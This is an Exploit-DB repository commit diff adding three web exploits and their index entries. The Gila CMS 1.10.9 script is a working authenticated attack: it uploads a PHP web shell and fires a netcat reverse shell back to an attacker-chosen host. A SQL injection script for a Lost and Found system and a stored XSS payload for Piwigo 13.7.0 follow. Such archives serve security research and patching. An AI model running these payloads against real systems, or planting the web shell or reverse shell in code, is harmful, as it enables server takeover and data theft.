DB: 2023-07-07

Exploit-DB · Exploit-DB · commit e2ea5c041241 · 2023-07-07T00:16:26.000Z
4 changes to exploits/shellcodes/ghdb

Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)

Lost and Found Information System v1.0 - SQL Injection

Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
diff --git a/exploits/php/webapps/51569.py b/exploits/php/webapps/51569.py
@@ -0,0 +1,100 @@
+# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
+# Date: 05-07-2023
+# Exploit Author: Omer Shaik (unknown_exploit)
+# Vendor Homepage: https://gilacms.com/
+# Software Link: https://github.com/GilaCMS/gila/
+# Version: Gila 1.10.9
+# Tested on: Linux
+
+import requests
+from termcolor import colored
+from urllib.parse import urlparse
+
+# Print ASCII art
+ascii_art = """
+ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗
+██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝
+██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗
+██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝
+╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗
+ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝
+
+                              by Unknown_Exploit
+"""
+
+print(colored(ascii_art, "green"))
+
+# Prompt user for target URL
+target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")
+
+# Extract domain from target URL
+parsed_url = urlparse(target_url)
+domain = parsed_url.netloc
+target_url_2 = f"http://{domain}/"
+
+# Prompt user for login credentials
+username = input("Enter the email: ")
+password = input("Enter the password: ")
+
+# Create a session and perform login
+session = requests.Session()
+login_payload = {
+    'action': 'login',
+    'username': username,
+    'password': password
+}
+response = session.post(target_url, data=login_payload)
+cookie = response.cookies.get_dict()
+var1 = cookie['PHPSESSID']
+var2 = cookie['GSESSIONID']
+
+# Prompt user for local IP and port
+lhost = input("Enter the local IP (LHOST): ")
+lport = input("Enter the local port (LPORT): ")
+
+# Construct the payload
+payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"
+payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"
+
+# Perform file upload using POST request
+upload_url = f"{target_url_2}fm/upload"
+upload_headers = {
+    "Host": domain,
+    "Content-Length": "424",
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
+    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",
+    "Accept": "*/*",
+    "Origin": target_url_2,
+    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",
+    "Accept-Encoding": "gzip, deflate",
+    "Accept-Language": "en-US,en;q=0.9",
+    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",
+    "Connection": "close"
+}
+upload_data = f'''
+------WebKitFormBoundarynKy5BIIJQcZC80i2
+Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"
+Content-Type: application/x-php
+
+<?php system($_GET["cmd"]);?>
+
+------WebKitFormBoundarynKy5BIIJQcZC80i2
+Content-Disposition: form-data; name="path"
+
+tmp
+------WebKitFormBoundarynKy5BIIJQcZC80i2
+Content-Disposition: form-data; name="g_response"
+
+content
+------WebKitFormBoundarynKy5BIIJQcZC80i2--
+'''
+
+upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)
+
+if upload_response.status_code == 200:
+    print("File uploaded successfully.")
+    # Execute payload
+    response = session.get(payload_url)
+    print("Payload executed successfully.")
+else:
+    print("Error uploading the file:", upload_response.text)
diff --git a/exploits/php/webapps/51570.py b/exploits/php/webapps/51570.py
@@ -0,0 +1,24 @@
+# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
+# Date: 2023-06-30
+# country: Iran
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : webapps
+# Dork : /php-lfis/admin/?page=system_info/contact_information
+# Tested on: Windows/Linux
+# CVE : CVE-2023-33592
+import requests
+
+# URL of the vulnerable component
+url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"
+
+# Injecting a SQL query to exploit the vulnerability
+payload = "' OR 1=1 -- "
+
+# Send the request with the injected payload
+response = requests.get(url + payload)
+
+# Check if the SQL injection was successful
+if "admin" in response.text:
+    print("SQL injection successful!")
+else:
+    print("SQL injection failed.")
diff --git a/exploits/php/webapps/51572.txt b/exploits/php/webapps/51572.txt
@@ -0,0 +1,15 @@
+#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
+#Date: 25 June 2023
+#Exploit Author: Okan Kurtulus
+#Vendor Homepage: https://piwigo.org
+#Version: 13.7.0
+#Tested on: Ubuntu 22.04
+#CVE : N/A
+
+# Proof of Concept:
+1– Install the system through the website and log in with any user authorized to upload photos.
+2–  Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded.
+3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered.
+
+#Payload
+<sCriPt>alert(1);</sCriPt>
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -19046,6 +19046,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,,
 44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80,2019-07-29,2019-07-29,0,,"Cross-Site Scripting (XSS)",,,,
+51569,exploits/php/webapps/51569.py,"Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)",2023-07-06,"Omer Shaik",webapps,php,,2023-07-06,2023-07-06,0,,,,,,
 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,,2020-06-16,2020-06-16,0,CVE-2020-5515,,,,,
 46557,exploits/php/webapps/46557.txt,"Gila CMS 1.9.1 - Cross-Site Scripting",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80,2019-03-19,2019-03-19,0,CVE-2019-9647,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.com1.9.1.zip,
 49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php,,2021-01-12,2021-01-12,1,,,,,,
@@ -22573,6 +22574,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5121,exploits/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Local/Remote File Inclusion",2008-02-14,MhZ91,webapps,php,,2008-02-13,2016-11-14,1,OSVDB-41835;CVE-2008-0803;OSVDB-41834;OSVDB-41833;OSVDB-41832;OSVDB-41831;OSVDB-41830;OSVDB-41829;OSVDB-41828;OSVDB-41827;OSVDB-41826;OSVDB-41825;OSVDB-41824;OSVDB-41823;OSVDB-41822;OSVDB-41821;OSVDB-41820;OSVDB-41819;OSVDB-41818;OSVDB-41817;OSVDB-41816;OSVDB-41815;OSVDB-41814;OSVDB-41813;OSVDB-41812;OSVDB-41811;OSVDB-41810;OSVDB-41809;OSVDB-41808,,,,http://www.exploit-db.comlookstrike-v0.9.zip,
 26688,exploits/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,webapps,php,,2005-12-01,2013-07-08,1,CVE-2005-3988;OSVDB-21328,,,,,https://www.securityfocus.com/bid/15665/info
 7896,exploits/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,webapps,php,,2009-01-27,,1,,,,,,
+51570,exploits/php/webapps/51570.py,"Lost and Found Information System v1.0 - SQL Injection",2023-07-06,"Amirhossein Bahramizadeh",webapps,php,,2023-07-06,2023-07-06,0,CVE-2023-33592,,,,,
 48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-11-05,1,,,,,,
 48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
 4710,exploits/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",webapps,php,,2007-12-09,,1,OSVDB-52880;OSVDB-52879;OSVDB-52877,,,,,
@@ -27604,6 +27606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42098,exploits/php/webapps/42098.txt,"Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting",2017-05-31,"Touhid M.Shaikh",webapps,php,,2017-05-31,2017-05-31,0,,,,,http://www.exploit-db.compiwigo-facetag_0.0.3.zip,
 42094,exploits/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",webapps,php,,2017-05-31,2017-05-31,0,,,,,http://www.exploit-db.compiwigo-facetag_0.0.3.zip,
 42443,exploits/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",webapps,php,,2017-08-10,2017-08-10,0,,,,,http://www.exploit-db.comuser_tags-0.9.0.zip,
+51572,exploits/php/webapps/51572.txt,"Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-07-06,"Okan Kurtulus",webapps,php,,2023-07-06,2023-07-06,0,,,,,,
 14973,exploits/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,webapps,php,,2010-09-11,2010-09-12,1,OSVDB-67968,,,,http://www.exploit-db.compiwigo-2.1.2.zip,
 33814,exploits/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Cross-Site Scripting",2010-03-31,garwga,webapps,php,,2010-03-31,2014-06-19,1,CVE-2010-1453;OSVDB-64359,,,,,https://www.securityfocus.com/bid/39144/info
 9962,exploits/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,webapps,php,,2009-10-18,,1,,,,,,
